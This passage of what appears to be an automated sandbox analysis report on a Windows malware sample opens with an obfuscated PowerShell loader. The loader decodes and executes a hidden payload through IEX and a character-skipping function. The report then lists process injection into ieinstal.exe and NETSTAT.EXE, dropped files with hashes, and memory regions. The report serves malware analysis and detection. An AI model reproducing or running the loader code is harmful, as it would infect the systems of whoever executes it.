R5Bo5Na4Sk6Le5Ch4 U8Fe4 G1Yo5 F4Tr1Tr9Of1 p8 M' P; B&Pl(Ek`$ReB TiPllBel GecadVrf FlFla Fd GeSyn As a7 A) S om`$BrV FiYel BdNctBrbryeEssCatMaa SnFid SsSa5Do A C Ti; R} I`$VeK Sa MnSan Li AbElaErlToiGlsNemKre O Ci=Sc CoMBaatirinkGarWak Ln Gu HdFueAfsEf0be4Mo Na'Si5 MAVa5Im4Kl4 E3 B5 RFNy5 G4Ko5joD A0Su2 C0Ta3St'Do;Ge`$ UOSjxAmaNul usRiyOcrUneHu He= T HyM Ea TrTakBarHakUnn zuUndBueMas S0 P4 H Un'Fu4 P4pr4 D2Is5La4 B4 R3 L0St2Tr0Le3Ud'Nu; d`$StMmiaImr Nk crFlkDon puWed MeFlsHa0 R3 D Sm= c EtM TasprFok Mr Uk Dn PuUndLaeHus N0 g4Om Ba' I7 C6Ba5Ag4 h4 S5 G7Be2 S5opE S5 CF S4Si2 F5 dE A5HeDko5co4 B6 P6In5Da8Ad5 AFAu5 M5 L5PeERy4 A6 W' D;Cu`$ UM AaSvrUnkEkrbok InKruDydboe Ps D0 b0Ag=CaMCla Sr GkEqrPak mn Pu adUresas A0Sy4 f To'Go6 H2 E5 H9 U5 CEHa4pl6 u6 O6Me5Mo8 I5 EF B5 T5Me5 RE P4Um6 R'Hy; S`$ AVSyiBylLudSutKabBieIns Dt Ma InNodOps e6Dr A=Kr PlM AaCer Ak ArUnk fnInuSodFle lsMa0ki4Ma Bl' P1 P5Sa6Re2Bi4Ca5st5BeCVo5Ct0Fo5ak6Ci4Ga5Me5 P4Bl5 OF A4Gr2Ak1 U1Sk0 TCSt1 R1 H6ZoA T6Ze2 B4 T8Ou4We2Fe4Re5 D5 H4Lo5SkCCo1InFRi6Hi3Vi4Me4 B5SuFLi4 t5Af5La8My5 PCHy5wo4 a1 IFba7Mo8St5 NFSe4Di5Pe5Ka4An4 S3 M5KrETa4Hi1Bi6 S2 H5Un4 A4 R3 A4 F7 s5Ma8No5 P2Br5St4 c4Mc2Un1 mFKo7 DCCi5 T0Be4 t3Ur4 P2De5 S9Ne5La0 E5AlD O6BlCBe0RuBKa0 EBTu7 B6Ud5Un4 B4 I5 R7 S5 D5Th4Ph5 VD B5 D4Re5Ta6 C5 K0 s4An5 E5Ha4Pr7Ti7Vo5FeE F4Mi3 J7On7 I4St4To5 DFUn5 C2 r4 E5Ch5Da8 E5HeEBu5ObF K6 S1Ti5OpEVa5 I8Fi5HoFMe4Op5Gl5Ma4 T4Ba3Ge1St9 A1St9Is5In7Fr5 SAPa4sv1So1Le1 P1 S5Kr7 FAPe5 R0Bi5 DF A5DiF H5 S8Si5Ls3 E5Ag0 E5SiDNe5Tj8 b4Kl2Se5SoC M5 U4Op1Bo1Im1 F5 U7 U3Di5Fo8Ku5SaDRe5 TD Y5sv4du5 L5Ny5 P7 B5TeD T5Re0Vr5Be5 B5 O4Ga5peFsp4 L2kt0Fe5Fu1Ov8Ba1LaD A1 F1It1Sp9le7 T6Un7Sa5 U6 S5 S1 U1Fe7Ge1 E1Op9Fl6 NAFo7 M8Un5HaFFi4Fa5Al6 R1Ra4No5Ug4Vo3Br6UnCUd1MoDZe1 B1Bo6ChA T6La4Ca7Zo8Te5 BF A4Br5 F0Sm2 U0Bl3Ha6 mCpa1LuD K1 S1Me6 NAEp6 S4th7Bi8 A5ShFno4sn5 A0Ja2Br0 D3Hu6 nCSt1StD S1 V1Ep6 TARe6Ro4Eg7Bo8Se5MoF F4So5Pr0 R2Ud0 P3Tr6 hCHo1 Z8As1 D1 S1Ga9Ac6 cANa7Mi8 S5 VFPe4Fo5 B6Ge1Un4Sp5 T4 S3Ka6SeC S1Ek8Pa1Am8Pe1 u8Ve'Me;Ln& S(Te`$suBJoi SlStlEfeBidUnfMrl Da MdKoe UnEfs G7Ul) K Ne`$ cVUni Rl Dd tt ubReeFjsRot LaIln NdHesIn6 G;Pe`$ UM waDer SkForMokTen suNodKoe Ls O0 K1 U ve=bi anMUba Ir SkDir LkPyn Cu sdCaeHessl0Ho4Ls F'Af1 G5 H6Pi5 o4An3 V5 R0Fa5 HF C5 R6Fo5Le4 F0Om8Op0 C0Bj1Kv1 B0SkCas1 s1Te6 VAFl6 e2Ke4wi8 Q4In2Tr4Sv5fi5Al4 K5 HC P1StFCa6Ps3Re4An4 P5BjFFo4Ov5 C5Kr8In5FoCIm5Fl4 m1 CFSc7en8ch5AmFFr4 A5Ci5Bi4 T4Un3Fo5VaEHy4 k1 M6 A2Ha5Un4 M4Ge3sk4Ud7Sp5In8 N5 I2Re5 A4Sk4Ou2 H1KrF S7deC S5 I0Mi4 H3 R4 L2Cl5To9Un5 K0Ma5AuDGu6AbCSu0 fB S0SkB S7 L6 T5 V4Di4Ca5 O7Sp5Hu5 F4 A5 MDEx5St4Er5 A6 H5As0We4Ho5Br5Di4 U7 D7St5 HE c4Pi3Cm7 S7Fi4 R4Di5prFKn5 F2 P4No5Lo5 M8Pr5EmEPo5 GF P6Tr1Co5 WEOl5Ty8 O5 DFCh4In5Ov5Ri4So4 m3st1 C9Un1Af9Ly5Om7 A5AbA V4Pi1Ko1 D1Be1Kn5Ja7 bETh4He9Sy5Ca0Ma5EnDwo4Di2Ut4 I8Gt4 Y3Su5Co4Kr1Po1 D1 V5So7InC B5 S0 E4Ma3Fr5AfA B4Fl3 B5 FA s5BaF S4ud4Pr5Un5 s5 A4Fe4Fo2Tw0Mi1 A0Ab1 i1In8Ri1 PDSo1 P1Mu1Ou9Un7 F6 S7 K5Ca6Ge5 U1 M1 S7 T1 M1De9Ch6 CA S7 K8 S5OvFPo4Pa5El6 K1Te4Ma5ko4We3Om6BrCUn1UnDAs1re1Sa6PrATe6Ca4 T7Gi8 C5SeFTr4do5Bu0 T2 P0 T3Se6TrCBe1ha8He1 B1Me1Ur9 i6OuA N7 P8 T5 tFPo4No5Af6Ur1Kl4Kn5Kb4 P3 B6 DCDo1Ma8 P1st8 H1 M8Br'Ne;bi&Fo(Ha`$PoBLni Ul Cl Be Gd kf Cl faIsdSae Jn Psix7Ga)Di di`$FlM oa Vr AkBar TkPrn RuRudSteVas F0Ne1Ep;Di`$ReMeua Tr Mk IrGrk PnAmuVadSue As T0Sa2Si Si=Ph AMMaakorUnksprhuk SnWiuDid KeTasSk0Af4 R Bi'Mo1 C5Gn6He5Sp5 I0Fi5Co0Kl4Ne3No1 S1 g0 UCUn1Te1 W6 UAAc6Co2Ne4 S8Ch4Ta2Ch4Um5Cy5In4Py5HeC P1 kFAd6Ba3Fo4Ba4 H5ChF F4Dy5Ay5 F8 D5SeCBl5In4Ej1MiFPe7Op8Et5 FFPe4 E5 r5ha4 I4 B3St5 GEVe4 K1Ls6Go2 S5Hy4Mi4 H3 D4Ga7 a5Oa8 O5 T2To5Gl4Ud4Un2Ph1KaF M7fiCCh5Li0 A4Kl3 D4Tr2 M5lo9 A5St0 S5FiDSe6BeC F0InB A0LbBKa7Su6 A5Re4 U4We5 O7Fo5pe5 C4an5BrDMi5in4 L5 S6Am5 P0Tr4 M5 w5No4Tl7Gy7Sk5 gE S4 K3 F7Gu7Ai4Sw4 F5cyF P5 U2 P4 B5Sk5Sk8Ok5PrE F5 VFPr6Ni1Pl5ThE T5 J8Ts5CoFRn4 I5Mi5At4Kn4St3go1Un9Sp1Sc9 E5 M7Gr5KaATa4Ma1 S1 H1Ts1 S5An7TeA H5 N0 M5RaFBr5 DF M5 S8 I5Ge3Be5 S0Pl5OuD G5Ca8Be4 K2Sn5DeCLo5 B4An1Fo1 A1 O5 C7 SCNy5 K0Ca4 S3Ac5UdAHe4 C3Ma5HaA A5 KFRe4 F4Me5Fo5 S5Re4 S4St2 T0Pa1In0Ch2Be1Qu8Na1SeDBi1ka1 h1Po9Re7Hy6 S7By5El6Ba5Du1 G1Oc7 T1Mi1 E9Du6VaAVa7 H8In5BiFSt4Un5Tr6Br1bo4 J5Sl4 B3Dy6 DCTe1 C8Fa1 N1Re1Ur9Ne6PrA T7Je8 P5StFFr4Im5Ri6 V1 I4 B5 U4Fa3Pr6jaC A1Ho8 T1Sp8Op1 D8Do'Mi;Am&Fi( s`$FoBCri Flsal SeChd Mf Plbra SdHaeCanDesLi7 N)Ni ku`$ EM SaAzrYokBarPek Fn VuPedBeeRes A0An2An;Ov`$FoVStiBulLadDitTebAneRas Bt NaKenKod Ls D7ar hi= K TaMEmaBarMak Sr LkSunMiuRadKvePes A0Gr4Sc St' P1 f5De4Re1Ve4Di2In5 T4 R4Ps4om5 D5Pe5seEpa5Pr9Cl5GaEUn5PoDBe5 OENe4or1Ha4Bu5Fr5fo8Kn5Sk2 G1So1Un0 NC S1Ho1 C1An5Mn6Re5Ps5St0Vi5 T0Yn4an3Bo1WrF P7Br8Ch5CoFIs4en7 F5 KE F5BeATo5 F4Ho1Pr9Re0 t1Ha1Ge8De'Un;Ab& F(In`$ FBSkiOvlOvlDie Ud SfBrlUna Mdcoe SnAts P7 a)tr Ap`$ChVLsi TlAsdNetTab PeSms MtSyaShn CdRosTa7la; A`$ SVHyiTolGad Gt ObOveNosTitFoaUnn UdUns R7Op T=Mi poM SaKurEnk Br IkUnnFeuGydFueChsan0Cr4 E m' K1Ko5Ca6 O5be4Ma3Be5 G0 S5DoFBe5 B6 A5Ta4 T0 b8Kr0Qu0Ag1geF U7th8 M5 SFTh4An7 B5 FEBi5 RA N5Sa4Re1Bi9In1 K5co4An1Ev4Sp2 D5Pu4 B4Fe4Sk5Te5 L5OuEde5Tw9Ga5SkE H5BaDQu5FlESl4Re1An4Sa5 P5Co8Xe5Un2 R1TrDRe1Vi1cl0Ra1 T1Di8 S' I; T& a(Un`$ MBKeiPal Kl Se AdFof PlDeaUndple HnKosMo7 S)Ed T`$ SVAdiPel DdTrtUnbSoeKos BtddaInnAndArsIn7 A;Ts`$DrM TuKalExtboiLgv FeArr BsGreas K=Kv FfMik Bppr Tr`$ MB Mibll ol Ge Rd FfLnlStaIndFleFon BsYo5Re Bu`$ EB Bi Ml PlSkeMidGrfmol GaBrdDeeHan KsQu6Ma;Es`$AnVSti AlCed PtPobLee Ss CtKoaPen UdSis U7Si R=Pr AfMCha Er nkBer FkSanvauBudLue Fs o0Ns4 m G'Ul1 F5 U7Fa7Ti5Ma8So5GeF I5Ag4 P5Wo5Ma4 A3ud5Co0 M4Po6Ov0me2Pe1Ek1Cy0 LCPo1Tr1 m1 H5 H6 E2Re4Sw5Si5InCSl5Gu0Co5Di6 D4 D5Ke5 E4 W5JeF R4Pa2 H1FuFSt7Ce8 S5 kF L4 R7 A5brEDa5 UACh5Su4In1 E9Bl6DrARa7Is8Ne5 CF B4 c5gu6Sa1 i4Ek5Be4 S3Op6 CC S0 EBSk0 CBRa6 SBsk5 H4Un4 D3Sp5TrEAn1 CDSl1Te1Ex0 M4An0 F6Co0 B7 H1MiDPe1te1Se0Un1 S4 A9 I0Du2 C0 r1 R0 l1 S0 B1 V1meD R1De1Fi0Ke1 P4 C9No0 M5Af0Lo1De1 B8Ta' K;ve&Co( A`$ PB Ni SlMal Gedad AfSkl PaSkd De Tn Ls S7 B)Ma O`$VaV PiSvlIndStt TbIneSps Nt HaTenIddFlsMa7Re; F`$ UV Bi Al VdIntnobDeeAbs Vt BaEfnCid KsUh8 S my= K SoM Ja ArFik KrMakMinFiuTad He Rs P0No4 H Tr'Tk1 L5Sp7Ar9Sk4 V4Co4be3 N4 U5Ot5 m4 S4Ta3 C4 b2Pr1 A1 t0 PCPs1Un1ko1Ro5Vo6So2 C4Di5Ge5BoCFa5 U0Ps5Me6 R4Ma5St5Da4se5ViFre4Ri2gr1EkF I7 S8Ol5RaF B4 P7 M5OvEVi5FjANo5Ma4Un1Ve9 t6AaAVo7Re8Lu5 BFko4 P5 P6Aa1He4 V5Ba4Ve3 O6PlCSp0SvBCh0muBEn6MuB s5Am4 U4St3Af5FlE M1 SDTr1 S1Ti0 u2 U0 I9Hj0 P4Sh0 s9Ng0 A1 U0 B3Kl0Sm3 N0 M5 S1MeDLa1 N1 I0 R1Nu4Pa9 R0 P2Lo0 D1No0 W1es0pr1 J1 NDSp1Sm1Up0Zu1Sl4Ek9Fl0 u5Ba1Go8 p'me;Fr&An( D`$inBKai ZlUrl CeBedUnfDul Sa DdIneGen Rsle7 a) S Gr`$RaV Bi Vl DdBotUfbAne nsPetPeaprnPed ssMu8 F;Dr`$phFBriRen SeMadFlrBoa PwSh2 p=Am`"""Re`$SeeMin NvKl:ByA DPAuPPuDKeAKaT HA M\InA DfAafsiaMal Ed Ts rsUdk KalikImt AeRonTh\ TpsprEleCosCisbieSpfHjo Pl Td S\CadAfuCoe UlNibUde Tn ZeBe\IsS BiRalHye bn PcLue Nd D\PrO UuOnt BlPse laG p DsKn1In2Ka3 E\UnLMaiUonSajBeeUdtOul slude HrIneTr.PoMKia TaDo`""" S;Li`$HoVTai HlOvdIatSub Uepis ItFea HnRed Ps L9Lu S=Tr SeM PaUdrFok CrLik Fn Tutid BeSts A0 U4un Ov'Yn1 B5no6 F7To5Cy8Po5 ADRe5Di5 E4 U5Re5Pa3So5 P4Os4 B2Sn4 S5 F5Fu0 P5DeFRe5Da5af4 A2Me1 R1 M0 PC c1 N1Eu6 UAKo6wa2 S4Ar8An4Se2pj4 V5Co5 E4Fo5 CCZi1 DF S7 G8 M7 DE G1StFEp7 U7Sh5Ko8 P5BaD K5Ka4mo6GaC D0SuB K0 FBFo6Bi3Ri5 U4Br5Sk0Pr5 A5Fo7 A0 K5 ADSc5TrDFo7 H3Li4Af8 F4Ou5st5Wr4 L4ri2Ln1ce9Op1 I5 K7Sh7 A5Sp8Me5KoF K5 J4Ol5Be5Nu4 R3Ig5 T0 K4sk6il0Co3Su1Br8Co' S;To& E( p`$ KBChiStlEplSkeTudirfFul Ra Sd Te KnSps S7 P)Ga ve`$ BV PiRulBid Mt Ib YeSasFot UaErn PdMosch9re; G`$SiC ShRooOvw SsSueInd U0 K O=Me ApMDaa Sr Kk FrNek Un CuMod BePosBu0No4 S A' F6 LALi6Sn2 M4Gi8Fl4Se2St4Mu5Sc5De4 k5 SCIn1 RF L6 O3Ko4Rd4 W5 SF T4 P5 S5Af8 B5 HCUn5 G4 d1DiFRe7Ma8 K5EgFAn4 K5ri5No4Pr4 a3 S5KvEUn4 B1li6ta2 P5bl4Ju4Ca3 t4 a7Af5 b8 S5 A2li5Sp4gu4 S2 R1FeF U7HaCop5 A0Ma4Te3Re4Bo2 G5 F9 B5 N0Ud5 DD B6 SC K0AfBFo0ArB H7Si2pi5HiEHi4 i1Ja4Ka8 R1 G9So1 R5 C6Fo7Sk5be8Ka5StDBe5 L5 S4No5Pa5 L3Be5 S4He4Be2 C4Br5 L5Se0Do5LtFPl5 F5Mu4 D2Si1 ZDFa1Me1In0Bl0 A0St1De0 a3Fo0at5ad1 RD D1 V1 O1Al1 F1 A5 p7Di7Ti5Ov8Gr5 PF N5Op4 L5 c5Ob4Sp3Pu5 B0In4St6Ma0Ba2Py1 GDPr1 F1Hr0Fo4 P0Sk6Sm0Br7ta1 T8 T' R; G&Ta( s`$VaBTuiFal Fl Bedid afInl Ba SdDeeFinTrs A7 A) O r`$BrCovh Io lwPas GeTidBi0Gr; L`$SaLEuiHegSte SsSctTui Pl ClFliPrnMigFus Ak AoTjnPus CuTol eeHon CtPoeMerUf=Re`$DoVGoi slTudUntFlbSteIksUnt daFrnFodDisPr. tc SoKnuMonpatKu-Ka5 C7 S6Tu- D1Ti0lo2Sn4Es; U`$PaCMah Ho Iw Is FesydSu1Co I=Sk mM TaUnr Gk Hr SkShnViuBad MeRes T0 s4Tu M' S6 IA O6Sa2 F4Re8Fo4Vi2 A4 C5In5Ap4Ud5PaC S1DrFUd6 M3 L4Be4Gr5ViF T4Sl5To5Fl8 H5HeC F5 U4 I1AnFPr7Pa8 F5 AFIn4Co5Pe5Es4Hy4Ba3Br5AgE R4 M1 U6Sl2Ma5 B4Yo4Qu3Pa4Re7Fo5 c8Ce5Co2 j5Pr4Po4 K2 T1MiFAk7BoC E5 L0Un4Tr3Sk4Su2He5 L9Se5 H0Ba5 fDPu6 MCRa0UnB H0coBIn7Fr2Ni5 FEDc4St1Tr4De8 U1 J9Os1Es5Sp6Sk7 P5Ma8De5maDSp5 k5 G4Ka5Ev5Ma3Im5 S4 O4St2In4 l5 S5 t0Am5 BF F5En5 T4Bu2Aa1phDPe1 c1Re0 M4Kr0Ku6Th0Er7 U1DaA M0 F0su0Pa1Gl0Ma3Ul0 E5 S1StD L1 B1 H1Eu5 C7Sw9 V4Bo4 M4 B3Me4Co5 U5 I4Op4 A3Gr4 B2My1QuD B1 d1Ad1El5 R7GrDAs5 P8Ha5 B6 G5Fo4Pe4 N2As4Sk5 S5 S8En5 TDTr5 BD D5Ru8 M5FlFSn5 F6El4Lv2 A5 BACh5 TE P5 CF U4 P2me4Es4 F5 SDPr5To4ba5FoF T4Ho5 g5Pa4To4La3Da1 P8Ru'Ad;Fa& b( A`$ GB Oi Ul PlDee Dd RfRilCha KdLyeHjn BsFr7En)Ov Fr`$HeCPihOvoGrwLasSueByd P1Ak; E`$ GC ThEso awUnsRoe MdOv2Bi Sm=An IMBuaForAykber Ck SnTeuZadTneGls B0gr4Mi W'wo1Hy5Mi6La2Ph5 ADTi5Am0Ap5BjFlo5Ne6So5Vo4Tc4Fa2Va1 H1 N0UnCSa1Ph1Jo6BoAPo6 A2te4 G8Pe4 V2 M4Ca5 O5 c4 V5LgC B1TiF U6Bl3Bo4Fu4El5 DF S4Pa5Ho5Im8Re5 GC U5Se4Fi1EeFMi7Sk8De5RoFSu4 B5 H5 m4 B4Mo3Sa5SmEUn4De1 E6 E2Pa5 N4Si4Ud3St4Pe7Fo5 H8 C5Ek2Bi5 M4re4 S2Pi1ThF u7ChCAn5Mi0Tu4kr3Ou4 B2 S5Ka9 P5 S0Ud5 PDEn6MiCSu0AbBFi0 ABFi7La6fi5sp4Or4Ph5Al7My5Sw5 R4 S5SkDIn5 T4 U5No6Pr5Un0 P4 T5 O5co4Te7Ec7ou5 iE L4 C3Te7Ra7 d4By4 B5 oF N5Hj2Ju4In5Al5Sp8 O5 DESy5 TFSm6Pr1 T5CzEBr5Wr8 A5 RF b4 s5Br5 P4An4Ud3 S1Tu9 H1ud9 D5Hj7En5FrAmo4 K1So1 R1 U1 D5Te7Co3 P5 B0Tr5 DDBi5 jDFo5 S4Sn4Ce5Ba5In5No5 N0 F5KoFLd4 C2 K5An4Cl4 h3 S5 S8 C5FlF C5bo5 S5De4hu4 P3Pr4Su2Kb1 C1Tr1Ha5 E7 RCeg5Du8 e5IoFRe5 H5Hy4Da3 Z5 R4 C4Fl7 A4Un3Li5Fr5 B4Cr2 G5 sAFo5LaE k5 KC p4co1Af5InD R5 Z4 T5CoAFi4Sp2 C5 E4Pr4Al3 N5EtF B5 P4Aw1Bi8 F1 LDHe1 M1Mo1Ee9 O7Ki6Ad7pr5Ef6 T5Fk1St1 K7Ph1Pr1Ve9Ka6 SAle7Ku8 K5BrFEn4 H5Ja6 T1Sk4Fr5Em4 I3os6KaCDy1 VDBe1Gu1Ba6SkA s7 F8 S5FoF R4 B5Ab6Ud1Gr4ca5 K4 A3Lu6 nC B1poD B1 s1Ba6 eA B7 M8Mu5 TFAu4Eb5 E6Re1Hi4 U5Ma4Re3 U6HiC I1 DD F1Mu1Fo6 nAax7 P8 L5 TFmi4 d5Lx6Ge1 H4Hy5Cl4In3 f6FaCMo1TiD T1Re1 B6SkAVa7Ln8 C5SmFEu4Lo5 K6 O1 N4Di5 b4 S3Uo6 FC A1Tr8 V1 I1 N1Pr9Te6ReACh7 H8 S5HvFDu4Li5 E6Ta1Hl4Ou5Se4Kr3Re6OlC B1 i8Ov1 P8Bi1Bo8 A' A;Fi&Tr(No`$ tB Ui ElMal Ce KdOpfkol UaAtd te MnHasSm7 N) B Si`$BrCAlhMao Qw SsSkeSkd K2 K; H`$UnC Ph NoAnwScs OeTadOm3 O Wa=Do GrM Ua CrStkGrr Ck cnwoufid seFus L0 A4 F M'Ka1Ba5Br6 O2Sy5CoD P5 S0Ob5PaF C5In6 U5Un4un4Bo2 D1 RFRi7 q8Fl5 UF N4Wo7Le5KoEBa5 RABe5 O4Po1 S9Co1Ud5 A7Fo7 u5Re8 C5TrF T5Pr4 K5Do5 v4Gr3Un5Su0 P4Ls6Un0Dr2 C1LyDSk1Ma5 A7Ra9As4 G4 O4Po3 f4Op5ek5Kr4 C4 W3 u4 R2Fl1HeD C1Ad5no7MiC F4 H4In5 NDBr4Be5Pr5 H8Te4tr7Ov5Ha4 M4ac3Ha4 C2 S5Co4 F1noD F0Pu1 S1GrD T0ru1Er1So8Al'Be;Bu&St(Pe`$LaB DiCelCllRee Id Af Pl NaEkd GesnnBis D7 T)Sk Ge`$ OC ShSpo Pw Fs Hemed p3St# G;""";;Function Chowsed9 { param([String]$Tobacconist); For($Croslet=2; $Croslet -lt $Tobacconist.Length-1; $Croslet+=(2+1)){ $Forvraenget = $Tobacconist.Substring($Croslet, 1); $Markrknudes = $Markrknudes + $Forvraenget; } $Markrknudes;}$Donkeymen0 = Chowsed9 ' EISkE sX B ';$Donkeymen1= Chowsed9 $Snydepropper;&$Donkeymen0 $Donkeymen1;<#Nongame Disketteabonnement Burhnes Forldreknudernes Mikrobes #>;"
          4⤵
          • Checks QEMU agent file
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:656
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            5⤵
            • Checks QEMU agent file
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1876
    • C:\Windows\SysWOW64\NETSTAT.EXE
      "C:\Windows\SysWOW64\NETSTAT.EXE"
      2⤵
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Gathers network information
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1284
      • C:\Program Files\Mozilla Firefox\Firefox.exe
        "C:\Program Files\Mozilla Firefox\Firefox.exe"
        3⤵
          PID:1548

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\ytr48n.zip

      Filesize

      486KB

      MD5

      1e73cacce02ae20026a81f1e56416aa3

      SHA1

      f491a7301ce11cf11a92c0245c7e03d927422286

      SHA256

      0dd0dd38cde5a14e7d6d0830db62cc7037e521fd042b0b8da0763128b2c0b3f2

      SHA512

      afe77facd8b16cc744ac2277414ffaf83436999d15eb8ac707f8098e2f8ed4cb29b430392ebe46b7fa65b20730615bc33dee9416f7141da5032a630894980a0a

    • C:\Users\Admin\AppData\Roaming\Affaldsskakten\pressefold\duelbene\Silenced\Outleaps123\Linjetllere.Maa

      Filesize

      257KB

      MD5

      18664229049ff13d286720a7106c8456

      SHA1

      82e80d15613e6a5c16878a36f79ac12716b365d8

      SHA256

      5f52abf449f9a70e852085cb60686c3781d54575fb02acd63e19a9acae84bdec

      SHA512

      bb950034d2f523d1c8774bc754322e03a473474d6392c8aab97abcd8eedda5c34dd50d5a6d246bc669ed0429f12d48a36ac4ca8717c80258428eb48a33901f72

    • C:\Users\Admin\AppData\Roaming\Affaldsskakten\pressefold\duelbene\Silenced\Outleaps123\socialkontorernes.Bon43

      Filesize

      25KB

      MD5

      dd40d45802e6762eee68b74665a0e9d3

      SHA1

      2a2c6668bec8e97461baa5438186b0dafb47f682

      SHA256

      64380fcadedba43b35224ae1407f3ba5d6d335a01f41e7fdeacc8d7648b5c4af

      SHA512

      dc130ca3b4df408827928a598c601a8070101d037c7b7c1aca6042416e586fba911b4bb82d72e2affb23d1a6cb7a50ece5d30d6f962b6210cb7ef565822ea29f

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VFWO80AWLKRFH3EOBIM0.temp

      Filesize

      7KB

      MD5

      395ac6a44d5fbe8992c3a9b552f1719d

      SHA1

      3b27bf6e7275b939298eb293115a5f5498265e5c

      SHA256

      70f1ee49f5e1267f32e0e7168b0ceaaee66a7a620865a7f9fd50f576673282db

      SHA512

      1348928cb25cedb6de7ff629a591ce3fee9796f6078227d03069a71725ae24eea0ba167f5bc698d0862cae013cbf6440f0bc4b8d50b8c8e1299bd6642bd8bc34

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      395ac6a44d5fbe8992c3a9b552f1719d

      SHA1

      3b27bf6e7275b939298eb293115a5f5498265e5c

      SHA256

      70f1ee49f5e1267f32e0e7168b0ceaaee66a7a620865a7f9fd50f576673282db

      SHA512

      1348928cb25cedb6de7ff629a591ce3fee9796f6078227d03069a71725ae24eea0ba167f5bc698d0862cae013cbf6440f0bc4b8d50b8c8e1299bd6642bd8bc34

    • \Users\Admin\AppData\Local\Temp\sqlite3.dll

      Filesize

      927KB

      MD5

      7fd80b1cc72dc580c02ca4cfbfb2592d

      SHA1

      18da905af878b27151b359cf1a7d0a650764e8a1

      SHA256

      1e6dccbdf8527abb53c289da920463b7895300d0d984cc7e91a3ecda4e673190

      SHA512

      13f7f29b5ed31c551aa5f27742557aa4d026a226087d6fcbca094819759ecc753a2c33b7422ae88dc6a4a0a966edb8485a18e59a0283ba2686cae5d78e0190a3

    • memory/656-69-0x0000000002790000-0x00000000027D0000-memory.dmp

      Filesize

      256KB

    • memory/656-71-0x0000000005C00000-0x00000000080CB000-memory.dmp

      Filesize

      36.8MB

    • memory/656-72-0x00000000027D0000-0x00000000027D1000-memory.dmp

      Filesize

      4KB

    • memory/656-73-0x0000000002790000-0x00000000027D0000-memory.dmp

      Filesize

      256KB

    • memory/1248-141-0x0000000006620000-0x00000000066D1000-memory.dmp

      Filesize

      708KB

    • memory/1248-97-0x0000000006620000-0x00000000066D1000-memory.dmp

      Filesize

      708KB

    • memory/1248-85-0x00000000063C0000-0x00000000064D6000-memory.dmp

      Filesize

      1.1MB

    • memory/1284-140-0x0000000061E00000-0x0000000061ED2000-memory.dmp

      Filesize

      840KB

    • memory/1284-89-0x0000000000680000-0x0000000000689000-memory.dmp

      Filesize

      36KB

    • memory/1284-94-0x0000000001F70000-0x0000000001FFF000-memory.dmp

      Filesize

      572KB

    • memory/1284-91-0x0000000002230000-0x0000000002533000-memory.dmp

      Filesize

      3.0MB

    • memory/1284-87-0x0000000000680000-0x0000000000689000-memory.dmp

      Filesize

      36KB

    • memory/1284-90-0x00000000000E0000-0x000000000010D000-memory.dmp

      Filesize

      180KB

    • memory/1672-62-0x0000000002710000-0x0000000002750000-memory.dmp

      Filesize

      256KB

    • memory/1672-61-0x0000000002710000-0x0000000002750000-memory.dmp

      Filesize

      256KB

    • memory/1876-80-0x0000000001250000-0x000000000371B000-memory.dmp

      Filesize

      36.8MB

    • memory/1876-88-0x0000000000400000-0x0000000000615000-memory.dmp

      Filesize

      2.1MB

    • memory/1876-86-0x0000000001250000-0x000000000371B000-memory.dmp

      Filesize

      36.8MB

    • memory/1876-84-0x0000000000200000-0x0000000000210000-memory.dmp

      Filesize

      64KB

    • memory/1876-83-0x000000001EB50000-0x000000001EE53000-memory.dmp

      Filesize

      3.0MB

    • memory/1876-81-0x0000000000400000-0x0000000000615000-memory.dmp

      Filesize

      2.1MB

    • memory/1876-79-0x0000000001250000-0x000000000371B000-memory.dmp

      Filesize

      36.8MB

    • memory/1876-78-0x0000000000400000-0x0000000000615000-memory.dmp

      Filesize

      2.1MB

    • memory/1876-76-0x0000000001250000-0x000000000371B000-memory.dmp

      Filesize

      36.8MB

    • memory/1876-74-0x0000000001250000-0x000000000371B000-memory.dmp

      Filesize

      36.8MB